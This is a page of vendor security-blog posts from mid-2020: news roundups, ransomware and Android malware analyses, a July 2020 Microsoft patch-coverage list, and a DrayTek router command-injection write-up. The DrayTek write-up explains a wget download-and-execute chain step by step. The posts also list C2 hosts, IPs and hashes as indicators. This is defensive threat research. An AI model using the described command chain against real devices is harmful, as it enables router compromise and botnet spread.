Posts

Cybersecurity News & Trends – 07-31-20

/0 Comments/in /by

This week, ransomware attacks on U.S. governments, the energy sector, sports teams and smartwatch maker Garmin made headlines — and with cryptocurrency on the rise, more may be in store.

SonicWall Spotlight

Malware is Down, But IoT and Ransomware Attacks Are Up — TechRepublic

  • Malicious attacks disguised as Microsoft Office files increased 176%, according to SonicWall’s midyear threat report.

Sharp Spike in Ransomware in U.S. as Pandemic Inspires Attackers — ThreatPost

  • COVID-19 has changed the face of cybercrime, as the latest malware statistics show.

Inactive wear! Smartwatch maker Garmin suffers widespread outages after ‘ransomware attack’ – leaving thousands unable to track their workouts — Daily Mail

  • According to Bill Conner, the combination of remote internet connections and less secure personal computers has increased organizations’ risk of being compromised.

Smartwatch maker Garmin suffers outage after ransomware attack — The Telegraph

  • SonicWall found that there had been a 20% increase in the number of ransomware attacks in the first half of the year, to more than 120 million.

HoJin Kim Named as part of CRN‘s Top 100 Executives Of 2020 list, we highlight 25 sales executives leading the channel charge — CRN Award

  • Kim has revolutionized pricing for MSSPs, with a pay-as-you-go model for SonicWall’s software products that delivers a cost savings of 20% over buying an annual license.

Cybersecurity News

FBI warns of Netwalker ransomware targeting US government and orgs — Bleeping Computer

  • The FBI has issued a security alert about Netwalker ransomware operators, advising victims not to pay the ransom and to report incidents to their local FBI field offices.

Russia’s GRU Hackers Hit US Government and Energy Targets — Wired

  • A previously unreported Fancy Bear campaign persisted for well over a year — suggesting the notorious group behind the attacks has broadened its focus.

UK govt warns of ransomware, BEC attacks against sports sector — Bleeping Computer

  • The UK National Cyber Security Centre has highlighted the increasing number of ransomware, phishing and BEC schemes targeting sports organizations.

Bitcoin rises above $10,000 for first time since early June — Reuters

  • After several weeks of trading in narrow ranges, Bitcoin has breached $10,000 for the first time since early June.

Feature-rich Ensiko malware can encrypt, targets Windows, macOS, Linux — Bleeping Computer

  • Threat researchers have found a new feature-rich malware that can encrypt files on any system running PHP.

CISO concern grows as ransomware plague hits close to home — ZDNet

  • An increasing wave of cybercrime targeting Fortune 500 companies is starting to ring alarm bells.

BootHole GRUB bootloader bug lets hackers hide malware in Linux, Windows — Bleeping Computer

  • When properly exploited, a severe vulnerability in almost all signed versions of GRUB2 bootloader could enable compromise of an operating system’s booting process even if the Secure Boot verification mechanism is active.

OkCupid: Hackers want your data, not a relationship — ZDNet

  • Researchers have discovered a way to steal the personal and sensitive data of users on the popular dating app.

US defense contractors targeted by North Korean phishing attacks — Bleeping Computer

  • Employees of U.S. defense and aerospace contractors were targeted in a large-scale spearphishing campaign designed to infect their devices and to exfiltrate defense tech intelligence.

In Case You Missed It

Exorcist ransomware casts triple punishment for non-payment. CIS countries spared.

/in /by

The SonicWall Capture Labs threat research team have observed reports of new ransomware named Exorcist.  It is reported to have surfaced over the past week on an underground Russian forum using the ransomware-as-a-service (RaaS) model with 30% commission retained by the creator.  The initial cost of file retrieval is $500 USD (in Bitcoin) but, increases by a factor of 3 if payment is not made within 48 hours.

 

Infection Cycle:

 

Upon infection, files on the system are encrypted and given a random six character ([A-Z][a-z]) extension eg. “.GyQUfe”.  The following image is displayed on the desktop background:

 

The malware drops the following files onto the system:

  • %APPDATA%\Local\Temp\boot.sys (0 bytes)
  • %APPDATA%\Local\Temp\msdt (0 bytes)
  • %APPDATA%\Local\Temp\d.bmp
  • GyQUfe-decrypt.hta (all dirs containing encrypted files)

 

d.bmp contains the image that is displayed on the desktop background.

 

GyQUfe-decrypt.hta contains the following message:

 

hxxp://217.8.117.26/pay and hxxp://4dnd3utjsmm2zcsb.onion/pay lead to the following pages:

 

The infection is reported to the same webserver (217.8.117.26) along with encrypted information:

 

Disassembling the code reveals the ability to disable various system recovery methods:

 

It also contains a list of processes to kill so that any related important files are no longer held exclusively open by such processes and can thus be encrypted:

 

Before infection, the malware performs a check to avoid encrypting systems in CIS (Commonwealth of Independent States) countries:

 

The malware states that the ransom fee will be tripled if payment is not made on time.  We confirmed this after checking back a few days later:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Exorcist.RSM_2 (Trojan)
  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

Cybersecurity News & Trends – 07-24-20

/0 Comments/in /by

This week, SonicWall reveals what the “new business normal” looks like for cybercriminals in the mid-year update to the 2020 Cyber Threat Report.

SonicWall Spotlight

SonicWall Report: COVID-19 Has Created ‘Boon’ For Criminals — ZDNet

  • In an article on SonicWall’s Mid-Year Threat Report, ZDNet highlights findings that hackers have shifted their strategies due to COVID-19.

The 2020 Rising Female Stars Of The IT Channel — CRN

  • SonicWall is proud to announce one of its own, Tiffany Haselhorst, has joined other leaders within the IT channel community on CRN’s esteemed 2020 list of 100 Rising Female Stars.

Cyberthreat landscape changes to meet new business normal of Work From Home: SonicWall — Channelbuzz.ca

  • In an article on SonicWall’s Mid-Year Threat Report, Channelbuzz highlights how cybercriminals have evolved their tactics to better exploit remote work environments during the pandemic.

Malware Attacks Down As Ransomware Increases — BetaNews

  • In an article on SonicWall’s Mid-Year Threat Report, BetaNews highlights findings that malware has dropped 24% and ransomware has increased 20% globally and 109% in the U.S.

Cybersecurity News

Using Robust Tools, Cybercriminals Accelerate Their Own Digital Transformation — SiliconANGLE

  • In the online underground, crime not only pays, but attackers are rapidly developing tools and networks that rival those of legitimate enterprises today.

Blackbaud Hack: Universities lose data to ransomware attack — BBC

  • At least seven universities in the UK and Canada have had student data stolen after hackers attacked a cloud computing provider.

Ongoing Meow attack has nuked >1,000 databases without telling anyone why — Ars Technica

  • Just hours after a world-readable database exposed a wealth of sensitive user information, UFO made the news again, this time because a database that stored user details was destroyed in an attack.

Apple’s Hackable iPhones Are Finally Here — Wired

  • Last year, Apple announced a special device just for hackers. The phone — for approved researchers only — will soon go into circulation.

New cryptojacking botnet uses SMB exploit to spread to Windows systems — Bleeping Computer

  • A new cryptojacking botnet is spreading across compromised networks via multiple methods that include the EternalBlue exploit for Windows Server Message Block (SMB) communication protocol.

Ransomware attack locked a football club’s turnstiles — ZDNet

  • Cyber criminals are targeting sports teams, leagues and organizational bodies — and in many cases, their attacks are successful, warns the NCSC.

Lazarus hackers deploy ransomware, steal data using MATA malware — Bleeping Computer

  • A recently discovered malware framework, known as MATA and linked to the North Korean-backed Lazarus hacking group, was used in attacks targeting corporate entities from multiple countries.

House-passed defense spending bill includes provision establishing White House cyber czar — The Hill

  • The House version of the annual National Defense Authorization Act included a provision establishing a national cyber director, a role that would help coordinate federal cybersecurity efforts.

Hackers use recycled backdoor to keep a hold on hacked e-commerce server — Ars Technica

  • Easy-to-miss script can give attackers new access should they ever be booted out.

Twitter Hack Revives Concerns Over Its Data Security — The Wall Street Journal

  • The alleged perpetrator, who called himself ‘Kirk,’ was part of a subculture where hackers trade in coveted social-media accounts.

In Case You Missed It

Draytek Vigor Remote Code Execution vulnerability attacks spotted in the wild

/in /by

DrayTek is a manufacturer of broadband CPE (Customer Premises Equipment), including firewalls, VPN devices, routers and wireless LAN devices. Vigor3900/2960 is a Quad-WAN broadband router/VPN gateway product.Vigor300B is a Quad-WAN load balancing broadband router that runs on the linux system.

Command-injection vulnerabilities (CVE-2020-14472) exists in the mainfunction.cgi file in the Draytek Vigor3900, Vigor2960, and Vigor 300B devices before version 1.5.1.1 . This can lead to remote code execution.

Sonicwall Capture Labs threat research team has spotted attacks exploiting this vulnerability in the wild.

Following are some examples :

Decoding the urls

The discussion below provides an analysis of the attack:

IFS is Internal Field Separator that the shell treats each character of $IFS as a delimiter. If IFS is not set then the default  sequence  is<space>, <tab>, and <newline>. So, in above attack ${IFS} is <space>. This means the attack constitutes of following commands

/bin/sh -c this will launch bash and execute the command that follows.

cd /tmp; will change the directory to tmp.

rm rf arm7; will delete all the files named arm7.

busybox wget <attacker’s website>; this will download a malicious file(arm7) from attacker’s domain. BusyBox is a software suite that provides several Unix utilities in a single executable file. It runs in a variety of POSIX environments such as Linux, Android, and FreeBSD.

chmod 777 arm7; makes the file readable,writable and executable by everyone.

./arm7; executes the binary which is potentially malicious

A quick check on shodan reveals certain vulnerable devices

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • IPS 15089:Draytek Vigor Remote Code Execution

IoCs
192.3.45.185
1.203.161.58
1.203.161.58
1.203.161.58
100.33.144.84
100.38.122.182
101.108.97.145
102.66.104.204
103.209.1.230
103.238.200.62
103.4.65.78
103.55.91.146
103.55.91.146
109.237.147.16
115.133.81.181
115.85.32.210
117.6.168.102
118.70.133.196
118.70.190.137
121.32.151.178
122.176.27.17
123.24.205.232
134.19.215.196
134.90.254.172
145.220.25.28

Reha ransomware targeting Arabic speaking countries.

/in /by

The SonicWall Capture Labs threat research team observed reports of a new variant family of Reha ransomware [Reha.RSM] actively spreading in the wild.

The Reha ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

The ransomware targeting Arabic speaking countries and designed for very specific region.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. < .Try2Cry >
    • %App.path%\ [Name]. < .txt > recovery instruction

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files with following extensions and appends the [Try2Cry] extension onto each encrypted file’s filename.

*.doc,*.ppt,*.jpg,*.xls,*.pdf,*.docx,*.pptx,*.xlsx

During our analysis, we have noticed the malware using a packer called DNSgaurd to avoid detection by sandboxes in the wild.

This makes our jobs harder to create a Decryptor tool for this ransomware.

However with some dynamic techniques we were able to inject our tool into the ransomware process and extract some valuable data that proves this is a ransomware.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

Translated to English:

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signatures:

  • GAV: REHA.RSM (Trojan)
  • GAV: Invader.H_176 (Trojan)
  • GAV: Pitit.A (Trojan)

 

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

450+ Financial Android apps targeted by a multifaceted malware that uses Covid theme

/in /by

SonicWall RTDMI engine recently detected an Android malware which pretends to look like a CoViD info app. It is an all in one malware which has functionalities of Banking Trojan, Spyware, Keylogger and Ransomware.

Non-existence of this malicious file at the time of detection on popular malware search portals like the VirusTotal and the Reversing Labs indicates the effectiveness of the RTDMI engine.

 

For an app which is circulated as a provider of CoViD Information, unwarranted permissions are requested which makes it suspicious:

                (permissions requested)

 

When the application is launched, a message to enable accessibility for “CovidSar2” is prompted continuously while malicious code is executed behind the scene. The app hides itself from the app list:

 

To evade detection from Google’s built-in malware protection, the app asks to disable Google Play Protect:

 

The app targets 457 applications by their package name. Targeted apps belong to banking, shopping, trading, finance & crypto wallet categories:

( Targeted package name Part1)

 

(Targeted package name Part2)

 

Technical Analysis:

Checking whether the app is running in a virtual environment:

 

The app hides its icon from the device which makes it difficult for the user to identify the app responsible for the activity:

 

Code to disable Google Play Protect:

 

It fetches installed application information from victim’s device which is later encrypted and sent to the C&C server “hxxps://tr3kjnf[.]xyz”:

 

It also has code which finds the app in the foreground, and accordingly gets an overlay page from the server:

 

Applications which use two-factor authentications for sign-in could possibly be compromised as it has the capability to read incoming messages including OTP:

 

The app has saved list of supported malicious commands in a locally saved configuration file named “set.xml”:

 

To fulfill the desired functionalities malware author has used the following commands:

del_sws: Delete incoming/outgoing messages:

 

gps: Sends victim’s location details:

 

getNumber: Reads contact numbers from phonebook:

 

spamSMS: Send spam SMS to numbers specified in the configuration file:

 

block_notification: Disable notifications from the specified package:

 

crypt / decrypt: Encrypts/decrypts a file with RC4 algorithm and adds/removes “.AnubisCrypt” extension:

 

htmllocker: Lock the screen and display ransom note:

 

findfiles: Searches files inside specific folder names and send them to the C&C server:

 

StartRecordSound: Taking recorded device audio with the current date and time in “.amr” extension:

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

 

Indicator of Compromise(IOC):

  • 04e16d09eec3a839506e7938516ca26b

 

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Cybersecurity News & Trends – 07-17-20

/0 Comments/in /by

This week, between breaches at Twitter, compromise at Citrix and cyberattacks against COVID-19 vaccine manufacturers, the case for a U.S. national cyber director got even stronger.

SonicWall Spotlight

Russian Cyber Espionage Group is Trying to Steal U.S. COVID-19 Vaccine Research — Newsweek International

  • SonicWall CEO and GCHQ advisor Bill Conner said, “Russia happens to be the first country placed in the spotlight, but it was only a matter of time before a nation state resorted to cybercrime to influence or control global healthcare during a time of great need. … [Cyber] criminals tend to follow the money trail, thus putting a massive bounty on anything vaccine-related.”

Cybersecurity News

Honeywell Sees Rise in USB-Borne Malware That Can Cause Major ICS Disruption — Security Week

  • Honeywell says it has seen a significant increase over the past year in USB-borne malware that can cause disruption to industrial control systems.

Malware adds online sandbox detection to evade analysis — Bleeping Computer

  • Malware developers are now using Any.Run malware analysis service in an attempt to prevent their malware from being easily analyzed by researchers.

This botnet has surged back into action spreading a new ransomware campaign via phishing emails — ZDNet

  • There’s been a big jump in Phorpiex botnet activity – but it’s a trojan malware attack that was the most common malware campaign in June.

New AgeLocker Ransomware uses Googler’s utility to encrypt files — Bleeping Computer

  • A new and targeted ransomware named AgeLocker utilizes the ‘Age’ encryption tool created by a Google employee to encrypt victims’ files.

The case for a National Cyber Director — Cyberscoop

  • Although the effects of COVID-19 will last for years, it’s already clear that shifting more activity online has increased our society’s digital dependence even faster than expected.

‘DdoS-For-Hire’ Is Fueling a New Wave of Attacks — Wired

  • Turf wars are heating up over routers that fuel distributed DDoS attacks.

New Mirai Variant Surfaces with Exploits for 9 Vulnerabilities Products — Dark Reading

  • Impacted products include routers, IP cameras, DVRs, and smart TVs.

TrickBot malware mistakenly warns victims that they are infected — Bleeping Computer

  • The notorious TrickBot malware accidentally included a test module that’s warning victims that they are infected and should contact their administrator.

Russian Hackers Blamed for Attacks on Vaccine-Related Targets — The Wall Street Journal

  • U.S. and U.K. government officials said a prominent state-backed Russian hacking group is responsible for ongoing cyberattacks against organizations involved in the development of coronavirus vaccines and other healthcare-related work.

A Brazen Online Attack Targets V.I.P. Twitter Users in a Bitcoin Scam — The New York Times

  • In a major show of force, hackers breached some of the site’s most prominent accounts, a Who’s Who of Americans in politics, entertainment and tech.

Citrix: No breach, hacker stole business info from third party — Bleeping Computer

  • Citrix has published an official statement to deny claims that the company’s network was breached by a malicious actor who says that he was also able to steal customer information.

In Case You Missed It

Malicious Android apps continue to use the Covid theme to spread different types of malware

/in /by

Android malware with Covid related themes continue to spread. SonicWall Capture Labs threats research team has observed different types of Android malware propagated by using the Covid-19 theme. This blog highlights some of our findings.

 

Dialer malware

  • Md5:e3475bc75d6d7225b3313942829f03bc
  • Package name: Mobile.bright
  • Application name: Corona virus

 

  • Md5: 4afe0e25e60504506a8005b58bdc74f8
  • Package name: com.my.photo.effect
  • Application name: COVID 19 UPDATE NEWS

 

  • Md5: 4161a3c2f04c60d7425ca0dbf08051d2
  • Package name: corona.virus.checkee
  • Application name: corona virus checker

 

Malicious dialers often contain telephone numbers to premium numbers. These dialers work in the background and dial telephone lines at other locations, causing the victims to incur expensive phone bills.

The samples listed below spread using Covid-19 related themes but do not perform the functions advertised. The samples contain hardcoded telephone numbers as shown below:

Coronavirus stats with suspicious functionalities

  • Md5: 42f2eda86a8fba07a0f389fec0a6e95b
  • Package name: dulcidion.coronainfo
  • Application name: Corona Info

This app presents itself as a live information provider for global Covid-19 related infections. In the background it uses a freely available API to gather the statistics.

Interestingly, this API has been connected to both malicious and non-malicious executable and apk applications. This further shows how malicious applications are providing relevant information while hiding their malicious content.

This app claims to provide information about Covid-19 infections in different parts of the world. However, it contains a number of suspicious functionalities within its code that look out of place considering what it claims to do:

Checking for root status of the device:

Clipboard functionality:

Checking if vpn is being used:

Checking if emulator,VirtualBox or Genymotion is being used:

 

Remote Access Trojans

  • Md5: 6ae422acd978c308e139456d674f719b
  • Package name: dkjfxgcxkumbroynfd.sizqhephspmlculghrpkmnb.bmkfzwiobchswd
  • Application name: COVID-19

 

  • Md5: 439be2e754cfc5795d1254d8f1bc4241
  • Package name: wfwcjawnldylkf.jlhhtjzefayylrzalmjg.msblgakkhbfpyahkugaezmxrsu
  • Application name: V-Alert COVID-19

 

Both these apps request accessibility service access after execution and keep showing the request window until access is granted. In the background the app (md5: 439be2e754cfc5795d1254d8f1bc4241) communicates with a specific twitter account to receive commands:

The shared_prefs folder contains a file – set.xml which contains a number of supported commands. A few dangerous commands from the list include:

  • keylogger
  • cryptfile
  • spamSMS
  • recordsound
  • vnc_start_new
  • htmllocker
  • textPlayProtect

We have covered a similar Android malware in more detail in one of our previous blogs.

Both the apps contain packed code which introduces a number of class files containing junk code. Upon execution both the apps drop a .json file in the app folder, however this is a .dex file in reality. This .dex file contains code related to malicious functionalities like collecting GPS location and sending SMS messages:

 

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • Dialer.TL_3 (Trojan)
  • Presnoker.AN (Trojan)
  • Cerberus.BN (Trojan)

 

Indicators Of Compromise (IOC’s):

  • 439be2e754cfc5795d1254d8f1bc4241
  • 6ae422acd978c308e139456d674f719b
  • 42f2eda86a8fba07a0f389fec0a6e95b
  • 4161a3c2f04c60d7425ca0dbf08051d2
  • 4afe0e25e60504506a8005b58bdc74f8
  • e3475bc75d6d7225b3313942829f03bc

Microsoft Security Bulletin Coverage for July 2020

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2020. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2020-1147 .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
ASPY 5964:Malformed-File exe.MP.144

CVE-2020-1350 Windows DNS Server Remote Code Execution Vulnerability
IPS 15069:Windows DNS Server Remote Code Execution (CVE-2020-1350)

CVE-2020-1374 Remote Desktop Client Remote Code Execution Vulnerability
ASPY 5966:Malformed-File exe.MP.146

CVE-2020-1381 Windows Graphics Component Elevation of Privilege Vulnerability
SPY 5965:Malformed-File exe.MP.145

CVE-2020-1382 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5967:Malformed-File exe.MP.148

CVE-2020-1399 Windows Runtime Elevation of Privilege Vulnerability
ASPY 5968:Malformed-File exe.MP.149

CVE-2020-1403 VBScript Remote Code Execution Vulnerability
IPS 14849:Suspicious JavaScript/VBScript Code 56

CVE-2020-1410 Windows Address Book Remote Code Execution Vulnerability
ASPY 5963:Malformed-File wab.MP.1

CVE-2020-1426 Windows Kernel Information Disclosure Vulnerability
ASPY 5962:Malformed-File exe.MP.147

Following vulnerabilities do not have exploits in the wild :

CVE-2020-1025 Microsoft Office Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1032 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1036 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1040 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1041 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1042 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1043 Hyper-V RemoteFX vGPU Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1085 Windows Function Discovery Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1240 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1249 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1267 Local Security Authority Subsystem Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1326 Azure DevOps Server Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-1330 Windows Mobile Device Management Diagnostics Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1333 Group Policy Services Policy Processing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1336 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1342 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1344 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1346 Windows Modules Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1347 Windows Storage Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1349 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1351 Microsoft Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1352 Windows USO Core Worker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1353 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1354 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1355 Windows Font Driver Host Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1356 Windows iSCSI Target Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1357 Windows System Events Broker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1358 Windows Resource Policy Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1359 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1360 Windows Profile Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1361 Windows WalletService Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1362 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1363 Windows Picker Platform Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1364 Windows WalletService Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1365 Windows Event Logging Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1366 Windows Print Workflow Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1367 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1368 Windows Credential Enrollment Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1369 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1370 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1371 Windows Event Logging Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1372 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1373 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1375 Windows COM Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1384 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1385 Windows Credential Picker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1386 Connected User Experiences and Telemetry Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1387 Windows Push Notification Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1388 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1389 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1390 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1391 Windows Agent Activation Runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1392 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1393 Windows Diagnostics Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1394 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1395 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1396 Windows ALPC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1397 Windows Imaging Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1398 Windows Lockscreen Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1400 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1401 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1402 Windows ActiveX Installer Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1404 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1405 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1406 Windows Network List Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1407 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1408 Microsoft Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1409 DirectWrite Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1411 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1412 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1413 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1414 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1415 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1416 Visual Studio and Visual Studio Code Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1418 Windows Diagnostics Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1419 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1420 Windows Error Reporting Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1421 LNK Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1422 Windows Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1423 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1424 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1427 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1428 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1429 Windows Error Reporting Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1430 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1431 Windows AppX Deployment Extensions Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1432 Skype for Business via Internet Explorer Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1433 Microsoft Edge PDF Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1434 Windows Sync Host Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1435 GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1436 Windows Font Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1437 Windows Network Location Awareness Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1438 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1439 PerformancePoint Services Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1442 Office Web Apps XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1443 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1444 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1445 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1446 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1447 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1448 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1449 Microsoft Project Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1450 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1451 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1454 Microsoft SharePoint Reflective XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1456 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1458 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1461 Microsoft Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1462 Skype for Business via Microsoft Edge (EdgeHTML-based) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1463 Windows SharedStream Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1465 Microsoft OneDrive Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1468 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1469 Bond Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1481 Visual Studio Code ESLint Extention Remote Code Execution Vulnerability
There are no known exploits in the wild.

Windows DNS Server Remote Code Execution Vulnerability CVE-2020-1350

/in /by

